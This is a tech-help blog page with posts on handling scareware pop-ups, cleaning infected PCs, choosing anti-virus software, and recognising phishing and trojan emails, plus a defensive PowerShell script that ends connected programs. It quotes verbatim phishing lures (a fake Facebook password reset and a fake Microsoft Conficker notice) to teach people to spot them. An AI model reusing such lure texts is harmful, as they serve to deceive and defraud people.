
Tech Geek and More

Technology Explained for All


How to: What to do if you get a virus or malware via a pop-up message

[Image: computer virus cartoon] There have been many posts on TechGeekandMore concerning viruses, spyware, malware, and scareware. If you wonder why, it's because as a tech, the number one question and the number one support call I take involves PCs that have already been infected (because the user didn't know any better) and what to do to clean up the PC.

Sometimes the infection isn't really bad and a simple scan and delete will clean things up; other times it's a matter of recovering/saving what you can from the PC and formatting/reinstalling everything (and yes, that could mean saying goodbye to important documents or a long downtime). On top of everything else, keep in mind that hiring someone like me to clean up your PC could cost $100/hr or more, and in some cases it may be more cost effective to buy a new PC.

So where do we start? We start with a couple of common DOs and DON'Ts.

1) If you're on any website and see a message like the following:

[Images: AV System Pro spyware pop-up; Personal AV fake install message]

DO NOT CLICK ON YES OR OK. It is a trick used by the writer of the virus or malware (known as social engineering) to get you to install the malware or virus. Since the message will probably pop up as part of the page you're on, you may think that it's a normal part of Windows and agree to it; at least that's what the bad guy hopes you will believe.

Additionally, when online, DO READ WHAT THE POP-UP MESSAGES SAY AND DON'T JUST CLICK ON THEM TO GET THEM OUT OF YOUR WAY. ADDITIONALLY, DON'T BELIEVE EVERYTHING THAT POPS UP (I know this is a hard concept for most). The following are just some of the MILLIONS of possible messages that you could see:

[Images: Conficker fake AV pop-up; assorted virus pop-up messages; fake Windows Security Center pop-up]

Now let's talk about how these happen. They can happen because the website you're visiting has been infected by a virus. These days it's not just PCs that get infected; it can also be websites, both minor and major (Scareware Pop-Ups Target Google, New York Times: http://www.waco.bbb.org/article/scareware-pop-ups-target-google-new-york-times-13118), so DON'T think that because the only sites you visit are major sites (Google, NY Times, Twitter, Facebook, etc.) you're entirely safe. You MUST always stay alert.

What if your machine is under attack from a virus or malware?

Take immediate action as soon as the message or pop-up comes up. The majority of viruses and malware are written in such a way that not only will your machine get infected, but the infection will go out to the internet (completely automatically) and download additional files and infections to reinforce itself. So the longer you take to address the issue, the harder (and probably more expensive) it will be to clean your machine. Imagine yourself getting the flu: you take care of yourself and in a few days your body recovers and everything is normal again. However, if you get the flu and ignore it and just let it continue without doing anything about it, you could get sick enough to end up in a hospital or even dead. (Sorry to make it so over-dramatic, but really that's what it boils down to.)

As soon as you receive one of these scareware/malware/virus pop-up windows, you need to use Task Manager to close whatever program you're using to get to the internet (you should NEVER try to close the program with the OK or Cancel button on the pop-up, as all the buttons, no matter what they say, will download unwanted files onto your PC). You can access Task Manager one of two ways:

Task Manager via Ctrl+Alt+Del

[Image: Ctrl+Alt+Del keys] Hold down Ctrl, Alt, and Delete at the same time.

[Image: Windows XP Ctrl+Alt+Del dialog] If you're on Windows XP you will see this box. Just select Task Manager.

[Image: Windows 7 Ctrl+Alt+Del screen] If you're on Windows Vista or 7, then you will see this window. Select Start Task Manager from here.

Task Manager via right-click

[Image: taskbar right-click menu]

Right-click an empty space on the taskbar (that's the bar on the bottom where you see your programs); you will see Task Manager as a choice. Select Task Manager from there.

Once you have opened Task Manager, you will see the following window.

[Image: Task Manager Applications tab showing Antivirus 2009] From the Applications tab you will see all programs that are currently running. Highlight any program that is connected to the internet (Internet Explorer, Firefox, Chrome, etc., and anything email) and select End Task. You will be prompted with an End Program dialog; select End Now. Continue doing that until you have closed everything that is connected to the internet.

[Image: empty Task Manager Applications tab]
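The Task Manager step above can also be scripted. This is an added example, not part of the original post: it finds every program that has a window (what the Applications tab lists) and an established TCP connection, reports what it is talking to, and ends it. It assumes Windows PowerShell 2.0 or later and the built-in netstat.exe; the $DryRun flag is my own addition so you can review the list before anything is ended.

```powershell
# Added example, not from the original post. Ends every windowed program that holds an
# established TCP connection, mirroring "End Task on everything connected to the internet".
# Assumes Windows PowerShell 2.0+ and netstat.exe (present on XP and later).

$DryRun = $true   # set to $false to actually end the programs

# Collect the owning process IDs of all ESTABLISHED TCP connections from "netstat -ano".
# Example line:  TCP    192.168.1.10:49712   93.184.216.34:80   ESTABLISHED   3120
$connectedPids = @{}
foreach ($line in (netstat -ano)) {
    if ($line -match '^\s*TCP\s+(\S+)\s+(\S+)\s+ESTABLISHED\s+(\d+)\s*$') {
        $owner = [int]$Matches[3]
        if (-not $connectedPids.ContainsKey($owner)) { $connectedPids[$owner] = @() }
        $connectedPids[$owner] += $Matches[2]   # remember the remote endpoint for the report
    }
}

foreach ($owner in $connectedPids.Keys) {
    # Never end this script's own shell, the Idle process (PID 0) or the System process (PID 4).
    if ($owner -eq $PID -or $owner -le 4) { continue }

    $proc = Get-Process -Id $owner -ErrorAction SilentlyContinue
    if ($proc -eq $null) { continue }

    # The Applications tab only lists programs with a visible window; services and
    # background processes (svchost.exe and friends) never appear there, so leave them alone.
    if ([string]::IsNullOrEmpty($proc.MainWindowTitle)) { continue }

    $remotes = ($connectedPids[$owner] | Sort-Object -Unique) -join ', '
    Write-Host ("{0} (PID {1}) '{2}' is connected to: {3}" -f `
        $proc.ProcessName, $owner, $proc.MainWindowTitle, $remotes)

    if (-not $DryRun) {
        # Same effect as End Task / End Now: the page's own buttons never get a chance to run.
        Stop-Process -Id $owner -Force
        Write-Host ("  ended {0}" -f $proc.ProcessName)
    }
}
```

Run it once with $DryRun left at $true to see the list, then set it to $false; a browser's helper processes without a window are closed along with their parent when the main browser process is ended.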

Once you have closed the window, what next?

This may take a little time, but it's best to check your PC and make sure nothing stayed on it that shouldn't be there. There are 4 things you need to do at this point.

Step #1

If you use Internet Explorer

Go to Tools –> Internet Options –> select Delete in the Browsing History section and delete all.

[Image: Internet Options dialog in IE]

If you're using Firefox

Go to Tools –> Options –> Privacy and select Clear Your Recent History and Remove Individual Cookies (you may need to change the setting to "Remember history" to get to these settings).

[Image: Firefox privacy settings] If you use any other browser, look for the area to remove cache, temp files or cookies and remove all.

***Also make sure you empty your recycling bin.***

Step #2

If you don't already have a copy on your PC, download SUPERAntiSpyware (LINK: http://superantispyware.com/) and install it. **There is a Free and a Pro edition; all you will need is the free edition.**

- During the install you will see the following screens. Make sure you say YES to "Would you like SUPERAntiSpyware to check for the latest updates…", then select the default or recommended setting for the remaining screens. On the screen asking for an email address you do NOT have to enter anything; you can just select the Next button.

[Images: SUPERAntiSpyware update prompt and installer screens]

Once installed you will see the following screen. Just make sure that the definition date (on the bottom right) is current (it shouldn't be more than a day or two old; if it is, click on Check for Updates), then select Scan Your Computer (on the top left).

[Image: SUPERAntiSpyware main screen] You will then see:

[Image: SUPERAntiSpyware scan options] At which point, select all your hard drives, select "Perform Complete Scan" and hit Next.

Once the scan completes,

[Image: SUPERAntiSpyware scan results] you will see the list of items found. I would recommend that all shown items remain checked; then select Next.

[Image: reboot prompt] Lastly, once the clean-up completes, you will be prompted to reboot. I recommend you close anything that is still open and select Yes to reboot.

Step #3

If you don't already have Malwarebytes, download and install it (LINK: http://www.malwarebytes.org/). **There is both a free and a paid version; home users just need the free version.**

– During the install you will see the following screens; you can select the default choices. Toward the end of the install you will see a choice for "Update Malwarebytes Anti-Malware"; make sure you have a check next to that choice.

[Images: Malwarebytes installer screens]

As soon as it is installed, you will see the following screen. Make sure to select "Perform full scan", select all your drives and run your scan.

[Image: Malwarebytes scanner tab]

Once completed you will see a list of all items found. Select all and remove. Then reboot the PC.

Step #4

Lastly, whatever anti-virus you have, make sure you update it to the latest updates or signature file (depending on which one you have) and run a full scan of all your drives. If it finds anything, select removal and then reboot.

If you don't have an anti-virus program or yours is expired, TGM recommends Microsoft Security Essentials, which is free. (LINK: http://www.microsoft.com/Security_Essentials/)

I know this was a long post, but the steps listed above are exactly the steps I would take if you called me (and probably most other techs) to take care of your PC. Hopefully this information helps you stay informed and helps you save a headache and some money in the future.

Software: What every Windows PC user should have installed to secure their PC – Part 1: Anti-Virus

[Image: computer cartoon] I know we keep talking about malware and viruses, and they are big issues (I know this because I spend a large part of every week cleaning clients' PCs of infections). Today I want to cover what you should have installed and what steps you should take on a regular basis to maintain your PC so that it runs as you would expect it to.

1st Thing – A good anti-virus program

You would be surprised how easy this one is, yet how often I find this rule being broken (as I'm being paid $100 an hour to clean up a mess). Your anti-virus program should be current and should be updated regularly. There are paid programs from Symantec, McAfee, or CA (as well as many others) and free versions from Avast or Microsoft (as well as many others). If you get a new PC you probably will get an anti-virus program loaded, but that program may only be licensed for 90 days, 6 months or 1 year, which means it will only update for that time frame, and unless you pay to continue using it you will no longer be protected from new viruses (there are literally hundreds of new viruses every week). You should also check your anti-virus program on a regular basis by opening it and looking to see if it says that your "definitions status" is up to date and that it shows you as protected (the example below is from Microsoft Security Essentials).

[Image: MSE update screen] You also need to make sure that your anti-virus software does not say that you're "At Risk" or "Not Protected". [Image: MSE "At Risk" screen] You wouldn't believe how many clients tell me "I have anti-virus installed, I didn't know I had to update it". I have even seen clients who are running anti-virus but get infected, and when you look at the A/V definition files they are from 2005 (that was the worst one so far, and I just saw that in Aug. 2009).

Now the question I'm sure at least a few of you are asking is what you should use. Well, here are my current recommendations.

Paid for Products –

Norton Anti-Virus "Gaming Edition" (http://www.symantec.com/norton/norton-antivirus-gaming-edition). I know what it says, "Gaming Edition", but from what I have seen, it's the version from Symantec that is least likely to slow your computer down while still protecting you.

NOD32 Anti-Virus 4 (http://www.eset.com/products/nod32.php). In reviews NOD32 always seems to be the one to catch the most viruses.

Both Symantec (http://www.symantec.com/norton/theme.jsp?themeid=trialware_nav2010&depthpath=0&header=0&inid=us_hho_downloads_navtrial) and ESET (http://www.eset.com/download/free_trial_download_eav.php) have "trial versions" that you can download and install on your machine for free (trials are 30 days) so that you can see how they work and make sure that the software works on your PC without any conflicts.

As you will see, I'm listing anti-virus versions; if you look at either Symantec (http://www.symantec.com/norton/index.jsp) or ESET (http://www.eset.com/) you will also see listings for "Internet Security" or "Smart Security" suites. In my opinion, I always recommend against a suite package, because you will pay a lot more to get some features you will probably not use, and suites are more likely to slow your machine down since they will try to do more than you need (in my opinion it's like getting a dead bolt for your door for the anti-virus software vs. having an armed guard standing in front of your door for the suite; unless you live in a war zone I don't think you need the armed guard). Additionally, there is always a chance that if malware does get in and you have an end-all, be-all suite, your suite could be disabled by the malware, killing all your protection at once. So I don't believe in putting all your eggs in one basket. In Part 2 I will talk about additional software to protect from other malware that is not covered by the anti-virus software.

Remember, with paid products you have to pay for the product and will have to pay on a yearly basis to renew the license so that you can continue to get updates for the product. So it isn't a one-and-done situation.

Free Products –

The fact that there are free anti-virus products out there means that you really have no excuse not to be protected. The main difference between the paid products above and the free products I'm about to list involves support. If you pay for the product you will get various support options from the maker of the software, in case you have a problem or need assistance. With free products that support is a lot more limited, and if you need assistance you will most likely need to turn to a knowledgeable family member, friend or a tech like myself. (Who doesn't know a teenager they can turn to at a moment like that?)

Microsoft Security Essentials (http://www.microsoft.com/security_essentials/). Microsoft Security Essentials provides real-time protection for your home PC that guards against viruses, spyware, and other malicious software.

Avast! (http://www.avast.com/eng/download-avast-home.html) offers a free version for protection of your PC.

Both the Microsoft and Avast! software help secure your PC against threats online. The Microsoft product only has a free version, while Avast! has both a free and a paid product. (Full disclosure: I currently choose to protect all my PCs with Microsoft Security Essentials.)

Procedures –

If you use any of these 4 products you will have a line of defense against infections that travel in cyberspace; however, remember some important steps.

  • You should only have 1 software product that includes auto-protect installed on your PC (one of the ones I list above or one of your choosing if you pick something else). You should never install more than one that includes auto-protect, because it becomes self-defeating: when you have more than one product installed with auto-protect, they will each think that the other is a virus and basically work on blocking each other.
  • You need to make sure that your choice of anti-virus software has auto-protect turned on and that it has current definition files.
  • Once a week, you should run a full scan of your computer with the "all files" selection on your scan. What I normally do is, one night a week, leave my computer on running a scan as I go to bed. The next morning I just verify the results, and if the results show any infection I can address it at that time. A full scan can take up to a couple of hours depending on how many files you have and how big your hard drive is.

[Image: MSE scan screen]

Lastly and most importantly, follow safe computing practices when you are online.

1. Don't open email attachments or click on links in emails, even if the email is from someone you know, because there is a good chance that the attachment and email were not actually sent by that person, or the person who sent you the email clicked on a link they shouldn't have and that email was automatically triggered. (Alert: Hiya:) Email – Just another attempt to get you to click on a link that you REALLY SHOULD NOT! http://techgeekandmore.com/2009/11/04/alert-hiya-email-just-another-attempt-to-get-you-to-click-on-a-link-that-you-really-should-not/)

2. Don't download files from places you aren't absolutely sure are safe. Think of this as the Halloween rule. Your kids go trick-or-treating, and when they get home what do you do? You check the candy to make sure it's safe before they get to eat any. In cyberspace you need to make sure you know where you download from; don't just assume that because it's in cyberspace it's safe.

3. Update all your software regularly. This one takes a little bit of work. However, you need to make sure that your operating system (Windows, Mac, or even Linux) gets updates installed when they are released. The majority of the time these days, updates involve fixes to the operating system that protect you from something a bad guy is doing. In addition to the operating system, there are other programs on your PC that need updating regularly to make sure that the bad guys don't use those to get into your PC. Programs like Adobe Acrobat, Adobe Flash, Adobe Shockwave, RealPlayer, Apple QuickTime, Microsoft Office (and others) all have updates released on a regular basis to correct issues that a bad guy can use to get in. When it's a program that needs an update, imagine your house as your operating system: you lock your door and you're secure; however, the other programs are the windows of your house, and, whoops, you forgot to lock your window. Guess what? The bad guys can still get in. All these updates help make sure that your doors and windows (no pun intended to Microsoft products) all remain locked to cyberspace.

**Coming up in Part 2 – we will cover your 2nd layer of defense and what programs you will need for that.**

Alert: Hiya:) Email – Just another attempt to get you to click on a link that you REALLY SHOULD NOT!

I'm not sure how many times I have said "Be careful with messages (instant message, email, Facebook, etc.); don't trust them even if they say they are from someone you know". The following email is supposed to be from a family member** of mine. I talked to them about the email, and they didn't realize that when they received the email from someone they knew and clicked on the link in the email, the email had automatically forwarded itself, even making it look like the family member was the one sending it. (**I did ask for permission from this relative prior to using his email.)

[Image: Hotmail message "try it free"]

Malware writers have been using these social engineering tricks for years in an attempt to get people to drop their guard and click on email links or download attachments. In real life, we hear news stories of bad guys dressing up as city employees or law enforcement and then tricking homeowners into letting them in, where the bad guys then proceed to steal from the homeowner (here is a release by the Chicago Police Department concerning crooks who use fake uniforms for access: http://www.chicagopolice.org/MailingList/PressAttachment/YourCastle.pdf). This email (and those like it) can be considered the cyber equivalent of the fake cop or fake city worker.

In real life we understand that if you aren't expecting the gas company or phone company and someone shows up at your door asking to check something in your home, you question them, check their uniform and ID, see if they have a company vehicle, and even call the business they claim to be from to make sure that the person at your door is actually from where they say they are. In cyberspace, it seems that because no one really understands how things work (TGM is working hard to change that), most people just assume that if it has the name of someone they know on it, "it must be from them". Well, nope. Let's go over a few things in this email that clearly show it wasn't from my relative:

  • "To:" – It's not addressed to me, since To: is blank, even though it is supposed to be an email from someone I know to me.
  • "Was bored so planned to write you" – I know my relative, and there are 2 points here.
    • 1 – He knows English and knows how to write in complete sentences.
    • 2 – He would not say something like "Was bored so planned to write you".
  • "i'm pretty sure your gonna smile after checking it…….:)" – I know my family member; if they were going to send me a link or attachment, they would say something about it and try to explain what it is they are sending me, not just tell me "hey, check this out".
  • "It's easy, secure and free / Try it now" – Again, what am I trying? Would you go to a store and buy a food product without a label to tell you what it is, simply on the idea that it's a food product in a store, so it must be good? I don't think you would (would you?).
  • "Yours Truly" – This is supposed to be a family member; that's a little formal, don't you think?

Ok, with that being said, again as always, in cyberspace act the same as you would if you were somewhere outside of your home in real life: pay attention to your surroundings, and for Pete's sake, if you run into someone on a street corner selling you Jack's Magic Beans, don't buy them.

Alert: Email Claiming to be a Facebook Password Reset Confirmation is a Trojan

[Image: Facebook logo] Another email is now circulating claiming it's from Facebook, claiming that your Facebook password has been changed and that your new information is in an attachment to the email. The email looks something like the following:

Hey (Insert you name here),

Because of the measures taken to provide safety to our clients, your password has been changed.
You can find your new password in attached document.

Thanks,
The Facebook Team

The attachment is actually carrying an updated version of the Bredolab virus. If you happen to open and download the attachment (which you shouldn't do), then what will happen is that Bredolab will automatically download and install really bad programs from the internet. Bredolab is basically the trigger that opens the door to your PC so that other files can download and install themselves: files like rogue anti-spyware programs that continuously keep popping up telling you that you are infected, and other programs that allow the bad guys to basically take over your PC. The easiest way to imagine this is that someone breaks into your home to steal, and not only do they take your property, but they also manage to take a key to your front door so that they can keep coming back anytime they like.

Bredolab is considered a Trojan horse and is smart enough to modify the legitimate Windows processes svchost.exe and explorer.exe, plus it has the ability to quit itself when it senses that something is scanning it, so that finding it can be very difficult.

As always, remember that even if you do change your password, Facebook (or any other site for that matter) would not send you account information in an email attachment.

Alert: Another attempt to trick you into installing Fake/Rogue Anti-Virus software

[Image: Microsoft logo] The bad guys are at it again, attempting to trick users into installing another version of fake/rogue anti-virus software. This time they are going back to a classic format: email. Emails are now circulating that claim to be from the "Microsoft Windows Computer Safety Team" and look very legitimate; I have seen a couple in my own email. The emails (example below) claim that Conficker is back and is infecting PCs, that Microsoft received a notification from your internet provider, and that it is sending you a "fix" to clean your machine. The "fix" is actually Antivirus Pro 2010, one of the many scareware files that Tech Geek and More has talked about in the past (http://techgeekandmore.wordpress.com/category/spyware/).

Please be aware that Microsoft (or any other software company) does not just randomly send out emails asking you to install things or asking for your information. Microsoft uses its many web pages like Bing.com, MSN.com (http://www.msn.com/) or Microsoft.com if it wants to pass along an official notice, and it uses the Windows Update service (http://windowsupdate.microsoft.com for users of XP or earlier; built into Windows for Vista and Win7 users) for its downloads. It would never just randomly send you a file to install.

*******Example of letter not from Microsoft************

"Dear Microsoft Customer,

Starting 18/10/2009 the ‘Conficker’ worm began infecting Microsoft customers unusually rapidly. Microsoft has been advised by your Internet provider that your network is infected. To counteract further spread we advise removing the infection using an antispyware program. We are supplying all effected Windows Users with a free system scan in order to clean any files infected by the virus.

Please install attached file to start the scan. The process takes under a minute and will prevent your files from being compromised. We appreciate your prompt cooperation.

Regards,
Microsoft Windows Agent #2 (Hollis)
Microsoft Windows Computer Safety Division

**********************************************

I have highlighted (in bold) some of the clues in the email that should tell you that this is a fake:

Date: 18/10/2009 – This is not U.S. standard.

Microsoft has been advised by your Internet provider that your network is infected – When Microsoft is advised by its partners, or even by technology geeks in the general public who find ways that a Microsoft product can be exploited, they issue press releases through the media or through their own web pages (as noted above), and all fixes are issued there, on Microsoft's sites, for all users of the affected Microsoft product.

We are supplying all effected Windows Users with a free system scan in order to clean any files infected by the virus. – Again, Microsoft would never do this, as it would be the most counterproductive measure: most people have more than 1 email address and many don't use the email provided by their internet provider (how many of you use @Comcast or @Fios email versus @Hotmail or @Gmail?), so how do you think Microsoft would actually know which emails to use?

Microsoft Windows Agent #2 (Hollis)
Microsoft Windows Computer Safety Division
– At least in my email conversations with Microsoft, the name of the person sending me the email appears in the signature. Additionally, if you do a search online for the "Microsoft Windows Computer Safety Division", you will find that Microsoft does not have a division by that name.

(Soapbox) The bottom line is that it's up to you, the user, to USE YOUR BRAIN when you're online. When you go out, you make sure you lock your door, set your home alarm, set your car alarm, pay attention to your surroundings when you go to a public place, and you don't just leave your wallet or purse on a table or counter in a restaurant or store (or at least I hope you don't). In cyberspace, just because you are not physically there doesn't mean that you don't need to take the same precautions that you do in real life. (End of Soapbox)

Alert: Rogueware with new Ransom Technology (This takes it up to a whole new level!)

The challenge these days seems to be trying to stay ahead of the criminals who try to steal from you via your computer. I get asked almost daily "Why do I keep having to update my anti-virus, anti-spyware or my anti-malware solutions?" "Can't I just update it once and get it over with?" Well, the simple answer is NO!

Let me ask you this: why do you listen to the traffic every morning on the radio on the way to work? Isn't finding that route to work where you can stop and get breakfast or your coffee at Starbucks good enough? Won't that get you what you need? Well… of course the answer is no. We all listen in case that one day we hear about a traffic accident or police action or broken water main or… well, you get the idea. We want to know this so that we can take a different route and try to avoid getting stuck in a traffic mess. Your route may never be affected, but you listen anyway every day, because that 1 time you don't listen, you know, will be the 1 time that your 30 minute commute becomes 4 hours (I did have that once; it was a nightmare). Ok, so now apply that analogy to why you update your software (operating system, applications, and your anti-virus/anti-malware protection): it's basically so that you can hope you never run into that "nightmare situation".

Now let me tell you a little about the latest nightmare that the bad guys have started releasing onto the internet that you and I travel. This one is called TotalSecurity2009 (from the same people that brought you AntiVirus2008, AntiVirus2009, and many others: http://techgeekandmore.wordpress.com/2009/08/29/alert-another-fake-anti-virus-program/). This one does the same things as the others: you go to an infected website and you see a pop-up that says "Your computer is infected, click scan now to clean your machine" (or something to that effect depending on which one you get).

[Image: Personal AV fake install message]

Then all of a sudden you start getting these pop-ups that look official and legitimate and even look like they may be part of your operating system, telling you that "the sky is falling" and that you need to buy (insert rogue malware name here), and that you can pay $XX (of course by major credit card) and they will clean your PC for you. That's like having a burglar walk up to your house and say, "Sorry, I just robbed your house; may I now install your new security system to keep me from robbing you again!"

Ok, back to TotalSecurity2009; this one has a new wrinkle, an extra level of sophistication like we haven't really seen before. In the past when you got infected you suffered through a lot of pop-ups and messages, but for the most part all functions of the PC still worked (OK, except maybe web browsing to a legitimate anti-virus website, which previous ones would redirect so that you would only see the anti-virus site pages they wanted you to see). TS2009 is different: TS2009 actually locks all your applications and files except for Internet Explorer, and that is basically so that Internet Explorer can keep giving you messages that you need to pay $79.99 to get the unlock code for TotalSecurity2009 and then be able to use TotalSecurity2009 to clean your system. So in essence, if you're a non-technical person and don't know any better, you will feel like you have no choice but to pay them to release your PC from malware jail.

Here is the biggest problem with paying them, because to me it really isn't about the $79.99; you will probably never get billed that amount. What you will have done is given a criminal your name and information and your credit card number, and in fact what it will cost you will probably be more than $79.99, with your information out in the open for the bad guys to use (and charge your card) at will until you close and change your accounts.

The following video comes from Panda Labs (a maker of legitimate anti-virus/anti-malware software) and shows how the rogue malware works and what effects it will have on your PC.

Video: "From Panda Labs: Rogueware with new Ransom Technology" (http://vodpod.com/watch/2362304-from-panda-labs-rogueware-with-new-ranson-technology?pod=techgeekandmore)

Additional information from Panda Labs can be found at http://pandalabs.pandasecurity.com/archive/Rogueware-with-new-Ransomware-Technology_2221_.aspx

Panda Labs has also cracked the rogue anti-virus so that you can unlock your machine if you get infected with this rogue malware. Once you unlock your machine, you can download a 1 month free trial of the Panda Global Protection software that you can then use to clean your PC: http://www.pandasecurity.com/usa/homeusers/downloads/register?Tipo=1&CodigoProducto=60&Idioma=2&TipoUsuario=12&Country=US&TipoLead=2&Ref=WWUS-GP10-DWN

    Additionally, you can also download Malwarebytes (http://download.cnet.com/Malwarebytes-Anti-Malware/3000-8022_4-10804572.html?part=dl-10804572&subj=dl&tag=button) and SuperAntiSpyware (http://superantispyware.com/) to do additional scanning of your machine to make sure everything is clean. 

         Remember, all 3 of these products, plus all other PC security software from a legitimate software company, still need to be updated by you, the user, before scanning or attempting to clean any malware from your pc. You don’t know whether your infection was created weeks ago or 1 hour ago, and all security software needs the latest updates from its maker in order to give you the best chance of cleaning your pc.

    UPDATE: Windows Live Credentials exposed – Microsoft Investigating.

        Microsoft has a post concerning the Windows Live IDs that were exposed in the past few days. 

    From the Windows Live Blog: http://windowslivewire.spaces.live.com/blog/cns!2F7EB29B42641D59!41528.entry?wa=wsignin1.0&sa=363915619

    *******************************************************

    10/5/2009

    Update: Phishing scheme affecting some Hotmail customers

    As of 3pm PT: We want to provide a quick update, that as a result of our investigation we are taking measures to block access to all of the accounts that were exposed and have resources in place to help those users reclaim their accounts.

    If you believe your information was documented on the illegal list, please fill out the following form (https://support.live.com/eform.aspx?productKey=wlidvalidation&ct=eformcs&scrx=1) to reclaim access to your account.

    Over the weekend Microsoft learned that several thousand Windows Live Hotmail customers’ credentials were exposed on a third-party site due to a likely phishing scheme. Upon learning of the issue, we immediately requested that the credentials be removed and launched an investigation to determine the impact to customers. As part of that investigation, we determined that this was not a breach of internal Microsoft data and initiated our standard process of working to help customers regain control of their accounts.

    Phishing is an industry-wide problem and Microsoft is committed to helping consumers have a safe, secure and positive online experience. Our guidance to customers is to exercise extreme caution when opening unsolicited attachments and links from both known and unknown sources, and that they install and regularly update their anti-virus software.  If you believe you’ve been a victim of a phishing scheme, it’s very important that you update your account information and change your password as soon as possible. More information on what to do is available on this page (http://windowslivehelp.com/solutions/accounts/archive/2008/10/25/what-to-do-if-you-think-your-accounts-been-stolen.aspx) at our support community.

    Microsoft recommends customers use the following protective security measures:

    • Renew their passwords for Windows Live IDs every 90 days
    • For administrators, make sure you approve and authenticate only users that you know and can verify credentials
    • As phishing sites can also pose additional threats, please install and keep anti-virus software up to date

    Answers to a few general questions about phishing scams

    Q: What should you do if you fall victim to a phishing scam? How should you respond? What steps should you take?

    A: If you think that you may have responded to a phishing scam with personal or financial information or entered this information into a fake website, you should take four key steps: (1) report the incident to the proper authorities, (2) change the passwords on all your online accounts, (3) review your credit reports and your bank and credit card statements, and (4) make sure you are using the latest technologies to help protect yourself from future scams.

    1. For the first step:
      • If you have given out your credit card information, contact your credit company right away. The sooner a company knows your account may have been compromised, the easier it will be for them to help protect you.
      • Next, contact the company that you believe was forged. Remember to contact the organization directly, not through the e-mail message you received. Or call the organization’s toll-free number and speak to a customer service representative. For Microsoft, call the PC Safety hotline at 1-866-PCSAFETY.
      • Then, report the incident to the proper authorities. Send an e-mail to spam@uce.gov to report it to the Federal Trade Commission and to reportphishing@antiphishing.org to report it to the Anti-Phishing Working Group.
    2. The second step is to change the passwords on all your online accounts. The reason for this is that a lot of people use the same password for multiple accounts. Start with passwords that are related to financial institutions or personal information. If you think someone has accessed your e-mail account, change your password immediately. If you’re using Hotmail, go to: http://account.live.com
    3. The third step is to review your bank and credit card statements and your credit report monthly for unexplained charges, inquiries or activity that you didn’t initiate.
    4. Finally, make sure you use the latest products, such as anti-spam and anti-phishing capabilities in e-mail services, phishing filters in Web browsers and other services to help warn and protect you from online scams.

    Q: How can I recognize an e-mail scam?

    A: There are several signs you should look for to identify a phishing e-mail: (1) Does it ask you to send your personal information? (2) Is it poorly worded or does it have typos? (3) Does it contain convincing details about your personal information? (4) Does it use phrases like “verify your account” or “you’ve won the lottery?”

    • Any e-mail asking for your name, birth date, social security number, e-mail username, e-mail password, or any other type of personal information, no matter who the e-mail appears to be from, is almost certainly a scam.  Microsoft and most other businesses do not send unsolicited e-mail requesting personal or financial information.
    • E-mails that are poorly worded, have typos, or have phrases such as "this is not a joke" or "forward this message to your friends" are generally scam e-mails.
    • Phishing mail often includes official-looking logos and other identifying information taken directly from legitimate Web sites, and it may include convincing details about your personal information that scammers found on your social networking pages.
    • A few phrases to look for if you think an e-mail message is a phishing scam are:
      • "Verify your account."
      • "If you don’t respond within 48 hours, your account will be closed."
      • "You have won the lottery.”

    Q: What should people do if they think they have received a phishing e-mail?

    A: If you think you may have received a phishing e-mail, you should take three steps: (1) take some time to check up on it and do not click on a link or give out your personal information, (2) make sure you have created a strong password for your account and (3) report the phishing scam.

    • The most important thing to remember is do not click on the link or give out your personal information.  It is possible for your computer to become infected with malicious software simply by visiting a phishing site – without you even realizing it. If you receive a questionable e-mail, take some time and check up on the information. Often sites like snopes.com list common e-mail scams.  Go to the website of the company you received the e-mail from and contact their customer service reps via phone or online to verify the validity of the e-mail.
    • Another thing you should do is create a strong password for your e-mail account by using more than 7 characters and having a combination of upper and lower case characters, numbers, and special characters, like the @ or # symbols. It’s also a good idea to change your password on a regular basis. The next time you change your Hotmail password, you can check “make my password expire every 72 days” to remind you to change it.
    • Finally, help us identify new scams. If you use Hotmail and received a phishing e-mail, you can select the dropdown next to "Junk,” and select "Report phishing scam.” Whatever you do, do not reply back to the sender. You should also report phishing scams to the Anti-Phishing Working Group by e-mailing them at reportphishing@antiphishing.org.

    Q: How common is this scam?

    A: The most recent version of Microsoft’s Security Intelligence Report (Volume 6) shows that more than 97 percent of e-mail messages sent over the Internet are unwanted: They have malicious attachments, are phishing attacks, or are spam.

    Q: Is Microsoft taking any proactive steps to prevent this from happening?

    A: To help protect people from phishing attacks, Microsoft is providing education and guidance to customers, collaborating with other technology leaders, businesses and governments and supporting law enforcement actions against phishers.

    • We provide guidance and information to customers about how to stay safe online at www.microsoft.com/protect and work with others in the industry and governments to educate people on online threats and safety tips.
    • From a technology perspective, because so much phishing comes from spammers, our Hotmail spam filter, called SmartScreen, blocks over 4.5 billion unwanted e-mails per day by distinguishing between legitimate e-mail and spam.
    • The Microsoft Phishing Filter, which is free as part of Internet Explorer 7, Internet Explorer 8, Windows Vista and as an add-on for the Windows Live Search Toolbar, also helps protect people from phishing attacks by identifying suspicious or confirmed phishing sites and warning customers before they reach them.
    • Law enforcement also plays a big role here. Microsoft has supported 191 enforcement actions against phishers worldwide.  These include civil lawsuits filed by Microsoft, as well as civil and criminal actions by international government and law enforcement agencies for which Microsoft made referrals and subsequently provided support. 
    • Microsoft is a founding member of the Anti-Phishing Working Group, a cross-industry association focused on preventing phishing. Microsoft also actively participates in DigitalPhishNet, an alliance between law enforcement and industry leaders in a variety of sectors, including technology, banking, financial services, and online auctioneering.  The group is focused on assisting law enforcement in apprehending and prosecuting those responsible for committing crimes against consumers through phishing. 

    Alert: “See Who Blocked You on MSN” Phishing Attacks

      This specific story came out a couple of weeks ago on the TrendMicro blog.  It involves an email that says “(Name of someone you know) has invited you to check who has deleted you or blocked you from their contact list on MSN Messenger.”

        In the past couple of days I’ve actually had 2 customers who have received this email and fortunately for them, they asked me about it before clicking on the email.  With that said, here is the post from the TrendMicro website concerning this current Phishing Attack.

    ******************************************************

    From http://blog.trendmicro.com/see-who-blocked-you-on-msn-phishing-attacks/
    11:22 am (UTC-7)   |    by Merianne Polintan (Anti-spam Research Engineer)

    We have received samples of a new phishing mail targeting users of MSN Messenger inviting them to see who deleted or blocked them from their contact list. Users would be interested to know who among their friends have deleted them from their lists.

    [Figure 1. Phishing email]

    Clicking on the link displays the following fake login page asking the user to input his or her password:

    [Figure 2. Phishing website]

    It is obvious that the intention of the cybercriminals is to harvest the user’s MSN Messenger login credentials. Afterwards, they can then continuously send spam messages to the account or, worse, they can use the account for their malicious intent.

    Getting in touch with friends is now much easier than before. Because of the growth of social networking sites, we can stay connected with our old friends, or even find new ones. This may include reading the profile pages of other members, sending and receiving invitations to fun games, videos and other applications. However, users must be on guard when interacting within online social networks. Spammers are now abusing these in their phishing attacks.

